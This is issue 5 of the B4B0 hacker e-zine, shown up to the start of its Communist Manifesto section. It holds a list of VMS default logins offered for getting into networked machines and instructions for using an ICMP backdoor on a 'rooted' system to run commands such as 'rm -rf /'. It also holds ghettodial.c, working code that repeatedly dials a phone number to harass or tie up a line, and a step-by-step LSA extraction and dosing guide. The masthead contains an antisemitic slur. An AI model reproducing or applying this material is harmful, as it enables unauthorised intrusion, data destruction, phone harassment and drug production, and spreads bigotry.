Copy Link
Add to Bookmark
Report
B4b0 05
VVVVVVVVVVV VVVVVVVVVVV
VVVVV[ T34M B4B0 PROUDLY PRESENTS: ]VVVV
VVVVVVVVVV VVVVVVVVVV
VVVVVVVVVV VVVVVVVVVV
. $&y VVVVVVVVVV ,p& y&$ VVVVVVVVVV,a8888a,
$$' VVVVVVVVVV,d$$$ $$' VVVVV .s$',8P"' `"Y8, .
yxxx.$$.xxxxxxxxxxxx ,d$"`$$.x.$$.xxxxxxxx.,8P.xxxx.s`$$,.xxxg
$ P' $$,d$$Yba, ,d$" d $$ $$,d$$Yba, 88 ,$.$$$ $
$ ' $$P' ,`$$a ,d$" ``" $$ , $$$P' ,`Y$a 88 ,s$,$$$ . $
$ $$k g Y$$ $$$$$$$$$$$$$ $$f d d$$ `8b ,$$'d$$' ,d $
bxxx.$$$, '`,d$".xxxxxxxx.$$.x.$$b, ',a$$".x`8ba,,aad$$'.xxxxd. .
s$Y"Y$bd$P',yas.VVVV s$$z $Y"Y$$$P"' "Y$$$$(headflux)$
VVVVVVVV VVVVVVVV
VVVVVVVV VVVVVVVV
vVVVVVVV VVVVVVVV
VV[ ISSUE: 5 ]VV
VVVVVVVVVVVVVV
VVVVVVVVVVVV
VVVVVVVVVV
VVVVVVVV
VVVVVV
VVVV
VV
b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!
THIS ISSUE OF B4B0 BROUGHT TO U BY THE LETTERS: E, L, and by the number 8.
b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!
>> b4b0 [V] <<
-------
-\ table of contentz \-
0x00 - The usual crap / note from editor - Qytpo (and the g4ng)
0x01 - A brief introduction to VMS - gr1p
0x02 - A Demonstration of RSA public key encryption algorithm -ohday
0x03 - Motorola emx2500 switching doqz (see mot.txt.gz)
0x04 - Bar Coding VS Magnetic Stripe Technology - Qytpo
0x05 - Neat ICMP backdoor - chrak
0x06 - Introduction to AS/400 Computing [Part - 1] - tymat
0x07 - LSA Synthesis - ph1xation (i found it intriguing...)
0x08 - ghettodial.c - Qytpo (tiz humorously stimulating.)
0x09 - High Level UNIX Socket Functions - presonic (see tcpip.tar.gz)
0x0A - erase.c - chrak (neat.)
0x0B - The Communist Manifesto (couldnt resist.)
0x0C - Commonly Written Network Functions for Linux/Glibc -banana
0x0D - TCP/IP TIC TAC TOE - r4lph (see nttt.c)
0x0E - This issues' Postal Madness (dedicated to our pal JP.)
0x0F - b4b0 headl1nes.. -Qytpo
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!! SPECIAL BONUS WAREZ ISSUE !!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
( see subdirectory appendix/ )
Appendix A: joystick library, itz pretty neat. -ohday
Appendix B: shellbin.c (emailed submission from 'cheddar')
Appendix C: smoothcolor.c (baldor and giemor - itz rad.)
b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0
-\ the people of b4b0 \-
position name
--------- ----
editor of this issue : Qytpo :
editor of last issue : jsbach :
grand master whacked : ge0rge :
canadian moose hunter : r4lph :
admin de b4b0 : tip :
offical b4b0 g00k : tymat :
pissed-off-and-lovin-it : segv :
witty : ohday :
gone as far as we know : gr1p :
missing in action : lore :
pissed off black man : shaki :
bovine warrior : the milk :
eskimo boy : presoniq :
crocidile dundee : duke :
can't speak english : flex :
-\ fact of the month -\
-----------------------
- there is a city in Mexico, close to the US border called "juarez"
-\ url of the month -\
----------------------
- http://members.xoom.com/yaro/macos/unload.htm (use java capable browzer)
-\ most inferior site of the month -\
-------------------------------------
- http://www.antionline.com
-\ most elite lib of the decade (*caugh*) -\
---------------------------------------------
libclear-1.00.tgz (sunsite.unc.edu/pub/Linux/libs/libclear-1.00.tgz)
#include <stdlib.h>
clear(void)
{
(void)system("clear");
}
clear_version(void)
{
(void)clear();
(void)system("echo Libclear version 1.00 by Michael Freeman\n");
(void)system("echo Press Control-D to continue\n");
(void)system("cat");
(void)clear();
}
*** the readme file continues to show this lib's eliteness:
LIBCLEAR -- VERSION 1.00 (i will fear 2.00 even more, maybe he will use a
path in his system() call.)
Ever wanted to be able to clear the screen in a regular unix program without
having to call a system("clear"); ? Well now you can! Just link your
proggies with this librarie and you can do clear very easily! Imagine just
doing clear()... And thats it! Libclear is not freeware however. If you
like libclear, you are encouraged to send $5 to me. You can reach my email
address at mikef@alexis.prism.net.
Any comments about this? Just direct them to me! mikef@alexis.prism.net!
Send any bug reports to mikef@alexis.prism.net!!! \=)
-Michael Freeman (el8 innovations)
*caugh*
*** and the INSTALL for this is even more funny:
Installing this is really EASY!!! Just type mae! :-) (mae? elite.)
That will compile libclear and make a test program that uses it!
You can run the test program once it's compiled by typing libcleartest!!
If you have any questions, please send them to mikef@alexis.prism.net!
*caugh caugh*
# mae
bash: mae: command not found
# NOW WHAT THE FUCK DO I DO?
bash: NOW: command not found
-\ the neat \-
--------------
oral sex, shroomz, chopin, hallucinogen, aphex twin, crystal method,
lsd, **girls who give head for conf info**, see previous thing, see
previous thing, see previous thing, see previous thing, bill clinton,
rainbow bright, the smurfs, my size barbie doll (ud be amazed what u can
do with thoze things.), nofx, vibrators that plug into a wall outlet,
coffee, coffee, and more coffee.
-\ the jewish \-
----------------
anyone who does, or knows anyone who gets on any irc network.
oh. and the guy who wrote that libclear crap.
--------------------------------------------------------------------------
<b4b0!b4b0!b4b0!b4b0!> 0x00 - Note from the editor <b4b0!b4b0!b4b0!b4b0!>
--------------------------------------------------------------------------
Well, on schedule as always, here is issue 5. it iz packed with
lots of great reading material, lotz of great educational code, and even
an article on how to make your 0wn drugs. IT CANT GET MUCH MORE DIVERSE
THAN THAT BABY.
As you all know, we have decided to take turns as the editor for
this magazine. I have made some changes myself, as I didn't like the
first few issues containing *WAY* too *MANY* IRC logs, and *WAY* too
*LITTLE* stimulating reading material, I made the difficult *caugh*
decision of doing away with them.
As for issue 4, well, we decided not to distribute it. It was far
too elite for anyone besides JP to handle. We are going to attempt
setting a deadline of about 1 issue a month, to meet the demands of our
extremely anticipating readers.
We now have www.b4b0.org up for your viewing amusement! All the
issues are posted on this site, and you can read them while there,
or you can download the b4b0.tgz archives. If you read them online, you
obviously wont be gifted with the presence of the files included in the
full archive. If you have any articles, or mail you wish to send:
we always appreciate submissions from people on the internet.
a special piq 0n the afr0 to srpato, efpee, gemmi, and any0ne else wh0
chillz with us that i may have missed. WE LOVE U GUYZ.
submissions@b4b0.org - article submissions
letters@b4b0.org - letters to staff
have fun kidz.
-Qytpo (optik@inficad.com)
--------------------------------------------------------------------------
<b4b0!b4b0!b4b0!b4b0!> 0x01 - a brief intro to VMS <!b4b0!b4b0!b4b0!b4b0!>
--------------------------------------------------------------------------
People have been asking quite a few questions about VMS/openVMS recently.
They are finding that some machines on University subnets are using OpenVMS
and they don't have any experience with this operating system, hopefully this
short guide will help a few people along and give them some introductory
knowledge of VMS.
VMS/OpenVMS is a multi-tasking/processing virtual memory operating
system, VMS standing for Virtual Memory System. It is designed to be able to
handle memory extensions beyond the capabilities of its processer (VAX -
Virtual Address extension). This therefore allows it to run software and
programs much larger than its physical memory and processer speed. VMS is
also run on the ALPHA platform, which uses Advanced RISC Architecture
which provides similar power to a VAX, but the ALPHA allows more
flexibility and is slightly more technologically advanced than VAX in the
fact that it can support installation of unix based Operating Systems as
well as VMS. The Differences between running VMS on a VAX or an ALPHA
platform are very small as most programs can just be recompiled and run
to suit whichever architecture VMS is running on. The float-type's and
Data Alignment technique's on VAX and ALPHA are slightly different, but
close enough to coherantly exist without causing any complimation problems
in Installation.
VMS was first developed in 1976 by DEC (Digital Equipment Corporation) as part
of their new 32 bit Virtual memory operating systems project. It has since
been supported by many Academic Institutions and large financial companies
due to its large power capabilities.
It uses a command line scripting language called DCL (Digital Command
Language) along with compiler capabilities in other more well-known
programming languages such as Pascal, Cobal, Ada, Fortran, C, Basic etc.
VMS is a very secure Operating System internally but it does often, by
default have some easy to access default logins. (similar to how IRIX
often has unpassword lp accounts etc.).
Some default logins on VMS include..
guest/guest
guest/<nopasswd>
operator/operator
system/system
system/manager
system/operator
support/support
decnet/decnet
field/field
default/default
operations/operations
When entering a VMS system will be receive a login prompt/message similar
to this..
-=-=-
Username: GUEST
Password:
Welcome to OpenVMS VAX V6.2
Last interactive login on Monday, 14-SEP-1998 20:09
Last non-interactive login on Tuesday, 15-SEP-1998 14:43
There are new messages in folder BLAH.
-=-=-
You are the presented with a prompt looking this this..
$
.x BASIC VMS COMMANDS x.
Below is a list of some basic commands that you will need to know to
navigate you way around a VMS system from the command line prompt comfortably..
HELP
If in doubt, There is always the help screen.
$ help
This is large and offers detailed help on MANY commands which are not
covered here.
LOGOUT
Logs the user out of the system.
EDIT
This brings up the VMS editor (which uses a VT-220 terminal)
ACCOUNTING
Accounting is the program that keeps logs of the usage users are making
from the system.
@
This executes a DCL eg.
$ @elitedcl.com
This is just the same as running a unix style shell script at the command
line or even a dos .exe/.com file at dos command line.
DEL
Deletes a file on the system eg.
$ del file.dat
RUN
This will run an executable file.
$ run elite.exe
DIR
Lists the contents of a directory.
There are two widely used options that you should know here.
/brief - gives a brief listing of the directory, similar to ls
/full - gives a full listing of the directory, similar to ls -al
but gives pages on information rather than a little
permissions/size chart..
SHOW
The show command has quite a few options and can provide a lot of
information about the system that you are on.
The command must be followed by an option, and some options include..
users - shows all online users at the current time.
time - shows the current local time of the system.
system - presents you with system information.
memory - shows you the memory the machine is using/running.
network - displays network information to which the VMS is connected.
process - process <processname>, similar to unix ps command.
devices - list of devices attached to the system.
quota - disk quota of current user.
TYPE
This command will display a file at the terminal, it is the same as the
unix cat command.
$ type <filename>
MAIL
This will send mail to any machine connected to any shared network or to
another local user on the system.
SET FILE/PROTECTION
This command sets permissions of files, similar to the unix chmod command,
however it has different levels of permissions than standard unix
permissions.
The most common permission for a regular users file is..
$ set file/protection=owner[rwed] leet.dat
This sets the permission of leet.dat to read (r), write (w), edit (e),
delete (d) permission of the user who owns the file. ie. owner
Other possible permissions include..
world - this (in place of owner) would make the file world (rwed?)
group - this would give permission to people in the same user
group
system - this would give permission to all users with system
access.
eg. $ set file/protection=world[r] leet.dat
Would result in leet.dat being world readable.
PHONE
Phone is a VMS chat program similar to the unix talk program.
type $ phone
and your prompt will change from a $ to a %
at this point type the username of the person you wish to chat with, you
can see if they are online via typing 'show users' beforehand.
% guest
would then start a talk session between yourself and the person logged in
as guest.
$PASSWORD
This would change the password of the user you are logged in as.
eg. $ $password fuqy0u
Would result in your new password being fuqy0u.
CREATE
Create is the pascal compiler that is used to compile .pas files.
$ create whatever.pas
would then result in the production of an executable file from the .pas
code.
.x FILE EXTENSIONS x.
Below is a list of common file extensions in a VMS enviroment, if I missed any
common ones out I apoligise..
com - A DCL Batch file.
cld - A DCL descriptor file (much like a windoze .dll).
dat - A general Data File.
exe - An executable file.
lis - System Directory listing file.
dir - A directory/Subdirectory file
tmp - A temporary storage file.
txt - A simple text file, also used for outputted mail files.
uaf - A user authorisation file.
sys - A System Image file.
mai - A Mail message file.
edt - A command file for the VMS EDT editor.
jou - EDT Journal which logs any known problems.
ada - Ada source code.
bas - Basic Source code.
c - C source code.
cob - Cobol source code.
for - Fortran source code.
pas - Pascal code.
obj - The compiler creates object code before it links the source
[ All examples within this text were demonstrated on an OpenVMS 6.2
system, which is a common VMS system found connected to academic networks
today. ]
9x - Spreading H/P in the new millenium.
http://www2.dope.org/9x
gr1p
gr1p@linenoise.org
--------------------------------------------------------------------------
<b4b0!b4b0> 0x02 - RSA Public Key Encryption algorithm demo. <b4b0!b4b0!>
--------------------------------------------------------------------------
//demonstration of the rsa public key encryption algorithm
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
int plaintext[] =
{
0x42, 0x34, 0x42, 0x30,
0x20, 0x4c, 0x30, 0x56,
0x45, 0x5a, 0x20, 0x59,
0x30, 0x55, 0x21, 0x00
};
unsigned char primes[] =
{
2 , 3 , 5 , 7 , 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47,
53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101, 103, 107,
109, 113, 127, 131, 137, 139, 149, 151, 157, 163, 167,
173, 179, 181, 191, 193, 197, 199, 211, 223, 227, 229,
233, 239, 241, 251
};
int isprime(short i) /* test any number less than 65536 */
{
int j;
if (i < 3) return 0;
for (j=0 ; j<sizeof(primes) ; j++)
{
if (i%primes[j] == 0)
{
if (primes[j] >= i) return 1;
return 0;
}
}
return 1;
}
int gcd (int a, int b)
{
int i;
i = a%b;
if (i==0) return b;
return gcd(b,i);
}
int modexp(int a, int x, int n)
{
int r = 1;
while (x > 0)
{
if (x % 2 == 1)
r = (r * a) % n;
a = (a*a) % n;
x /= 2;
}
return r;
}
/* calculate e and d */
void calculate (int *ep, int *dp, int t, int p, int q)
{
int e,d=0;
int n;
for (e=3 ; e<t ; e+=2)
{
if (gcd(t,e)==1) break;
}
for (n=1; n<65536; n++)
{
if ((t*n+1)%e == 0) {
d = (t*n+1)/e;
break;
}
}
*ep = e;
*dp = d;
}
void rsa (int p, int q)
{
int n,e,d;
int i,j,t;
int c,de;
int ciphertext[128], decrypted[128];
n = p*q;
t=((p-1)*(q-1));
/* compute the second part of the public
and private key pair (e and d)*/
calculate (&e, &d, t, p, q);
printf (" public key: %u,%u\n",n,e);
printf ("private key: %u,%u\n",n,d);
printf ("\nciphertext: 0x");
for (i=0 ; i<15 ; i++)
{
ciphertext[i] = modexp(plaintext[i], e, n);
printf ("%x",ciphertext[i]);
}
printf ("\ndecrypted: ");
for (i=0 ; i<15 ; i++)
{
decrypted[i] = modexp(ciphertext[i], d, n);
printf ("%c",decrypted[i]);
}
printf ("\n\n");
}
int main (void)
{
int p,q;
int i;
printf ("\n");
srand (time(NULL)); /* this is so secure. */
p=0; q=0;
while (1) {
p = rand()%200;
if (p<16) continue;
if (isprime(p))
break;
}
while (1) {
q = rand()%200;
if (q<16 || p==q) continue;
if (isprime(q))
break;
}
printf ("first prime is %u, second prime is %u\n",p,q);
rsa (p,q);
return 0;
}
--------------------------------------------------------------------------
<b4b0!b4b0!b4b0!b4b0!> 0x03 - Motorola EMX2500 dox. <b4b0!b4b0!b4b0!b4b0!>
--------------------------------------------------------------------------
Please see included file, mot.txt.gz
--------------------------------------------------------------------------
<b4b0> 0x04 - Advantages and Disadvantages of Magnetic Stripe Tech. <b4b0>
--------------------------------------------------------------------------
Bar Coding VS Magnetic-Stripe Technology:
While there are many variations on a basic theme, magnetic-stripe
recording is not really all that different from printing bar codes. In
magnetic materials, there is a two-state choice of polarity, just as
there is a two-state choice between either black or white in many printing
processes. In fact, with magnetic recording there are "fences" of plus
"pickets" strucureded against minus backgrounds (or vice versa), analogous
to black bars on white backgrounds. In both circumstances information is
delineated by the locations on recording media where there are either
plus/minus flux or black/white color changes.
Just as with bar codes, information is recovered from magnetic
stripes by sweeping read heads across entire coded surfaces and converting
positional information into pulse-widthe modulated voltages. As recovered
voltages are exactly the same in both circumstances, there is no inherent
first read rate or substitution error rate difference betewen the two
technologies. Rather, these issues are functions of how well particular
vendors design their instruments and what patterns of pickets they elect
to use.
On the other hand, because magnetic materials are most homogeneous
than most printing materials, information can be packed more densely on
magnetic stripes than bar codes can be printed on conventional papers.
While these higher packing desnsities are advantageous in some
circumstances, they require the use of smaller wand tips. Rubbing on
abrasive magnetic materials, these smaller wand tips will not last as long
as the larger tip jewels used on some bar-code wands.
The sensing elements currently found inside magnetic wand tips
have been designed around a number of different magnetic phenomena
including the Hall Effect, the Magnetostrictive/Piezoelectric Effect,
magnetic transistors, and one of the several mangeto-resistances. At the
present time, magneto-resistors appear to be simpler and less expensive
than the alternatives and are most commonly used. In this application,
magneto-resistors have a depth of field of about 0.007 inch. This means,
that for all practical purposes, wand tips must be held in contact with
magnetic stripes during read traverses. Or at best, the magnetic stripes
can be covered only with a very thin film of non-magnetic material.
As the coding density potential for magnetic stripes is superior
to that of bar codes, magnetic stripes may well have an advantage in those
applications where a great deal of information must be machine-read from
data cards. Then too, where information stored on a card is subject to
change (to updating), the magnetic stripe technique may well be the only
practical answer. But these attributes have limited application to
general manufacturing problems, and other traits inherent to magnetic
recording are lmited. For instance, it is difficult to print magnetic
stripe labels. Certainly the use of adhesive magnetic-stripe labels
manually attached to multiple copies of documents is not a pragmatic
solution to document identification systems. Further, magnetic stripes
cannot be read from a distance, data destruction of magnetically encoded
messages is not visible if it occurs, and magnetic stripes can easily be
erased by an imposed magnetic field of very few gauss.
-----------------------
Magnetic Stripe Reading
-----------------------
Disadvantages:
- expensive media
- not human readable
- modifiable
- word processing incompatbile
- difficult to copy
- restricted format
- low print rate
- cannot be read through plastic cover
- not beam scannable
Advantages:
- read-write capability
- low error rate
- non-critical wanding
- full character set
----------------
Bar Code Reading
----------------
Advantages:
- easy to print
- easy to copy
- word processing compatible
- low error rate
- non-critical wanding
- full character set
- inexpensive media
- non-restricted format
- inexpensive to read
- high speed printable
- material imprintable
- beam scannable
Disadvantages:
- low information density
- - - - - - - - - - - - - - - - - - - -
- Most information for this article -
- came directly from "The Handbook of -
- Bar Coding Systems" - Hary E. -
- Burke, under the aegis of the Data -
- Pathing Systems Divison/NCR -
- Corporation. If you are interested -
- in this subject, i suggest this -
- as reading material. -
- - - - - - - - - - - - - - - - - - - -
-Qytpo
--------------------------------------------------------------------------
<b4b0!b4b0!b4b0!b4b0!> 0x05 - Neat ICMP backdoor <b4b0!b4b0!b4b0!b4b0!>
--------------------------------------------------------------------------
Please see included file, icmpbd-linux.tar.gz
the client attaches a string to the end of the icmp header, sets the ip src
addr to 6.6.6.6 and icmp type to 8. the server which should be running on
a linux system when it receives the icmp packet it will exec the string
that was attached by the client. Just ./server on the rooted system.
and to exec commands on it completely anonymously you can: ./client <ip
addr of system> rm -rf / or anything else. This is only one way though and
you can not see the executed programs output.
-SHAKI/chrak
--------------------------------------------------------------------------
<b4b0!b4b0!b4b0> 0x06 - AS/400 Information <b4b0!b4b0!b4b0!b4b0!>
--------------------------------------------------------------------------
Introduction to AS/400 Computing
Part 1 - Very Basic Concepts
tymat@b4b0.org
I. Key Features of the AS/400
AS/400 is a computer platform made by IBM that runs the OS/400 Operating
System. The three key features of the AS/400 are:
1) Integrated Applications - software components such as relational database
programs, security software, internet applications, and programming
environment are part of the Operating System.
2) High Availability - like most IBM computing systems (like AIX) the AS/400
is considered as a high availability system by which most major changes
to the system do not require an IPL (Initial Program Load or a reboot).
3) Multiprocessor - an AS/400 machine can have many different processors
separate from the system processor which is responsible for a
particular I/O device. Figure 1.1 shows a typical AS/400 configuration.
Figure 1.1
____________________
| System Processor | // New models of the AS/400 can have
|__________________| // up to 12 64bit processors
|
|
____________|_____________
| System Main Bus |
|________________________|
/ \
/ \
_____|___________ ________|________
| I/O Interface | | I/O Interface |
|_______________| |_______________|
| |
______|________ ________|______
| SPD I/O Bus | | PCI I/O Bus |
|_____________| |_____________|
/ \
Devices...... Integrated
PC Server
- Novell
- Lotus Domino
- Windows NT
- PC TCP/IP Stack // This is independent of
- TCP/IP Firewall // OS/400s own TCP/IP stack
- Proxy Server // and vice-versa.
- Lotus Domino SMTP Mail
Other key features that make the AS/400 an attractive platform to many
business are:
4) Single Level Storage Technology - Programs work with objects and object
names so hardware is always accessed by name and not by its address.
5) Large Address Size - With a 64bit addressing space, the AS/400 can address
up to 18.4 quintillion bytes.
6) Fully Object Oriented - All system resources, such as data structures, are
packaged within an object. This means that AS/400 instructions can
only work on what they are supposed to work on so data will never be
treated as executable code.
7) Internet Ready - New AS/400 systems have full internet capabilities which
allows AS/400 machines to act as web servers (with full SSL
capabilities).
8) Robust Programming Environment - OS/400 comes with several different
programming environments such as CL (Control Language), ILE, COBOL, RPG
III & IV, and Java
II. TCP/IP Connectivity
The AS/400 supports many different TCP/IP application protocols such as FTP,
SMTP, Telnet, and network printing. The AS/400 has a complete implementation
of the sockets API which are all integrated into OS/400.
The AS/400 supports many different network interfaces ranging from token ring,
ethernet, x.25, frame relay, fiber distributed digital interface, and
serial.
III. File Structures
There are 10 different file structures which are divided into 5 main categories.
Each file structure has a corresponding CRTxxxF command which is used to create
these files. Figure 3.1 is a chart which summarizes these file types.
Figure 3.1
File Type Subtype File Description Create Command
Database File PF Physical File CRTPF
LF Logical File CRTLF
Source File PF Physical Source File CRTSRCPF
Device File DSPF Workstation Display File CRTDSPF
PRTF Printer File CRTPRTF
TAPF Tape File CRTTAPF
DKTF Diskette File CRTDKTF
ICFF Intersystem Communications CRTICFF
Function File
DDM File DDMF Distributed Data Management CRTDDMF
File
Save File SAVF Save File CRTSAVF
Ok, that's it for this issue. From now on there will be an AS/400 related
article in every issue of B4B0 and each will depend on previous AS/400
articles released in this zine. The purpose of these beginner-level
articles is to get the reader up to speed on AS/400 basics so in the near
future I will be able to discuss an overview of AS/400 security and
probably base these articles for more in-depth lectures on AS/400 security
and programming in the future. It is quite sad but 99% of B4B0 readers
have no clue about AS/400 and if I started discussing advanced AS/400 topics
it would only go to waste.
Next issue we will tackle more about file structures and then I will start
discussing more user-level related tasks such as maneuvering the OS/400
menu system and customizing commands.
--------------------------------------------------------------------------
<b4b0!b4b0!b4b0!b4b0!> 0x07 - LSA Synthesis. <b4b0!b4b0!b4b0!b4b0!>
--------------------------------------------------------------------------
Phixation's guide to synthesizing Lysergic Acid Amide from MG seed'z
Introduction: This article I have written is a run through on the cleanest most
effective way in synthesizing LSA from Morning Glory Seeds. I suggest all
Acid Heads read furthur, that is if you havent fried your brain to the
core yet like some of us. Believe me, having a fully functional brain
could make such an insurmountable difference. Keep in mind we are going
to be working woth Petroleum Ether (Naptha). In some cases it could be
EXTREMELY deadly.
1. Equipment
2. Ingredients
3. Um.. freeze. kr0nfieldz
(Note. You may want to go to the bottom detailed explanation on how the s
eed/ethanol ratio goes so you know how much of what to add.)
------------------------------------------------------------------------------
Section 1. Before you pickup any of the chemicals/ingredients you need for
this extraction it is a neccessity that you atleast have the following
equipment, or something that is an equal substitute for any of the
following that is required.
2 Jars with lids on them. (One for the pet ether, the other for the MG/Ethanol)
1 coffee filter or funnel (To filter the ether from the MG seeds)
Coffee filters or filter paper (For use with funnel)
coffee grinder (To grind the MG seeds)
-------------------------------------------------------------------------------
Section 2. Most of the following is required, the other shit is dumped on your
own personal preference.
(Uhm.. freeze. Ingredients)
Morning Glory Seeds, (1 seed = 1 microgram..)
Petroleum Ether (In hardware stores you can find it as "Naptha")
Any type of Ethanol liquid that will work for human ingestion.
Any of the following will work: Bracardi 151, Segrums 7 50%, Vodka,
Everclear, Basically just any beverage of 80 proof or better.
--------------------------------------------------------------------------------------
Section 3. (Uhm.. freeze! Cornfields in one hour! Be there or be square =)
Try to take good precaution while doing this, although it is fairly safe.
I could see some people gettting just a little bit carried away with the Pet
Ether. Im sure inhaling it makes you feel splended.. at first, but as I said
before! Its fatal!
(*note* This document is assuming your using 500mg seeds.)
1. Wash MG seeds good in detergent and cold water...
2. Grind the MG seeds in the Coffee Grinder to the finest the powder will get.
3. Put the grinded seeds into one of your jars, and then add enough Pet
ether (Naptha) to where the grinded seeds are just barely submerged
beneath the Pet ether.
4. Put the lid tightly on the jar and shake rapidly for 20 minutes on and off.
5. Now remove the lid and pour the shit into the filter with the filter paper
in place. (Note. If you want to be safe, do this outside. Otherwise the
Naptha could dispute a rather hostile gas.)
6. You should now have the Pet ether in one of your jars, and the grinded
seeds should be on the filter.
7. Let the seed powder dry out on a paper plate for a good 2/3 hours.
8. After the powder is dry, place it in the other jar.
(This part could be quite crucial if not performed with the preffered ratio.)
9. Now add the desired amount of alchohol depending on the intensity you want
to experience in your trippy journey. (Read below for details.)
-------------------------------------------------------------------------------
(Uhm.. Freeze! Bucktooth.)
If you are new to tripping, or are just scared of intense trips, I suggest
using about 30-50 seeds every 1`oz of ethanol(alchohol). Per`se you wanted to
make a 500 seed batch, then you would poor about 10oz of ethanol into the
jar with the powdered MG seeds.
If you are cool with your average intense trip with some neat hallucinations,
but mild to an extent, use 1`oz per every 250 seeds. Which in this case
you probably used 500 seeds, so put 2oz of alchohol in the jar with the
powdered mg seeds.
(If you want stronger, figure it out. Im sure you understand how the delution
ration works)
----------------------------------------------------------------------------
10. After you have mixed your desired amount of alchohol with the seed powder,
shake the jar quite frequently on and off for about 3 days.
11. All of the LSA should be deluted in with the ethanol by now. Use your filter
one more time, and filter the ethanol from the seeds.
12. Throw the seeds away and preciously glance at your cup of acid.
13. If you made it using 500 seeds, and 2oz of ethanol, drink half of it. 15
seconds later you should feel quite odd. The response this type of acid
is almost instantanious due to the fact that the LSA is deluted with
ethanol, and ethanol hits your mucus membraine and goes strait to your
brain. If you used 10oz of ethanol then there should be about 50
micrograms per ounce. Split your cup of the liquid into 1/10
and take a 1/10. If you want stronger affects take a bit more.
Conclusion: Hrm.. well thats about it. Just hoped you payed attention to my
little tips that I put in here and there. And uhm.. w0rd to
all yew buckt00th raz0rcats..yew f00lz are da fuqin sickmade.
Um.. ph33r da bucktooth.
Phixation..
--------------------------------------------------------------------------
<b4b0!b4b0!b4b0!b4b0!> 0x08 - GhettoDial.c - Qytpo <b4b0!b4b0!b4b0!b4b0!>
--------------------------------------------------------------------------
/* Qytpo - 1998 */
/* */
/* merely for your amusement. nothing special, or technically superior */
/* use it to get out of exams. ANI your favorite classroom line. */
/* etc etc. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <signal.h>
#define MODEM "/dev/cua1" /* yer modem port.. of course */
/* /dev/modem if yer not sure.. */
#define DIALSTRING "ATDT5551212\r" /* number to dial..put *62 in */
/* front if you want to call */
/* anonymously, depending on your */
/* phone company. */
#define INTERVAL 10 /* the time between calls */
int main(int argc, char *argv[])
{
int fd;
int ret;
printf("\n%s - Qytpo\n", argv[0]);
printf("\nEach [.] represents a call.\n");
printf("\nNumber to dial: %s", DIALSTRING);
printf("\n\nDialing: ");
fflush(stdout);
while(1) {
fd = open(MODEM, O_RDWR | O_NOCTTY | O_NDELAY);
if(fd == -1) {
perror("open();\n");
printf("Unable to open comport: %s\n", MODEM);
exit(-1);
}
ret = write(fd, "ATZ\r", 4);
if(ret == -1) {
perror("write();\n");
printf("Unable to initialize modem\n");
exit(-1);
}
sleep(2);
ret = write(fd, DIALSTRING, strlen(DIALSTRING));
if(ret == -1) {
perror("write();\n");
printf("Unable to dial number\n");
exit(-1);
}
sleep(INTERVAL);
ret = write(fd, "ATH\r", 4);
if(ret == -1) {
perror("write();");
printf("Unable to hang up modem.\n");
exit(-1);
}
close(fd);
fprintf(stdout, ".");
fflush(stdout);
}
close(fd);
exit(0);
}
--------------------------------------------------------------------------
<b4b0!b4b0> 0x09 - High Level UNIX Socket Functions - presonic <b4b0!b4b0>
--------------------------------------------------------------------------
High Level Unix Socket Functions (v0.2)
jjohnson@eagle.ptialaska.net | presonic@irc
(See tcpip.tar.gz)
This is the second release. Changes include readline() and
some new features in i_nslookup. This version also includes
the http_ver.c example, and subscan has been updated. God
knows why I made two different versions of subscan. I couldn't
decide which one was better, so I included them both. I plan
to actually start working on this as one of my main projects,
so lots of shit should be implimented in the next release.
Thanks to seyon for lending me his fbsd box.
Tested on:
* linux 2.0.* (slackware/redhat)
* freebsd 2.2.7
(please note that the subscan examples will
not work properly in any bsd variant due to
its design. http_ver, however, works great.)
Shit planned for future releases:
* high level icmp sending/receiving
* high level udp sending/receiving
* high level raw icmp/udp/tcp
* high level tcp server/daemon functions
* multi-platform abilities
These functions can be used to learn how to use socket functions,
or to avoid learning them. That part, has been left to you.
Both subscan and http_ver are examples on how to use the socket
functions. subscan uses advanced non blocking i/o and select()
stuff, so it may be hard to follow for neophytes.
You may use these in your program however you please. All I ask
is that you drop me an e-mail to tell me what you're using it for.
See tcpip.c for more details.
Files:
README your fat.
Makefile type 'make' and see.
tcpip.c *the* socket functions.
subscan.log.c a scanner that sweeps a subnet for a given port.
(appends the scan to a log file, stdout is closed)
subscan.stdout.c a scanner that sweeps a subnet for a given port.
(sprays output to stdout)
http_ver.c this query's a web server and try's to find the server
version.
--------------------------------------------------------------------------
<b4b0!b4b0!b4b0!b4b0> 0x0A - erase.c - chrak <b4b0!b4b0!b4b0!b4b0>
--------------------------------------------------------------------------
#include <stdlib.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
#include <sys/mman.h>
off_t getflen(int);
void pexit(char *);
void main(int argc, char *argv[])
{
unsigned char *buf;
FILE *f, *r;
int i1;
off_t i, len;
if (argc == 1)
{
printf("usage: %s file\ndestroys file -chrak\n", argv[0]);
exit(-1);
}
if ((f = fopen(argv[1], "r+")) == NULL)
pexit("fopen");
if ((r = fopen("/dev/urandom", "r")) == NULL)
pexit("fopen");
len = getflen(fileno(f));
if ((buf = mmap(0, len, PROT_WRITE, MAP_SHARED, fileno(f), 0))
== (void *) -1)
pexit("mmap");
for (i1 = 0; i1 < 3; i1++)
{
for (i = 0; i < len; i++)
buf[i] = fgetc(r);
/* do error checking later */
sync();
printf("Finnished pass %d\n", i1);
}
if (remove(argv[1]) == -1)
pexit("remove");
}
off_t getflen(int fd)
{
struct stat str_stat;
if (fstat(fd, &str_stat))
{
perror("fstat");
return -1;
}
return str_stat.st_size;
}
void pexit(char *s)
{
perror(s);
exit(-1);
}
--------------------------------------------------------------------------
<b4b0!b4b0!b4b0!b4b0> 0x0B - The Communist Manifesto <b4b0!b4b0!b4b0!b4b0>
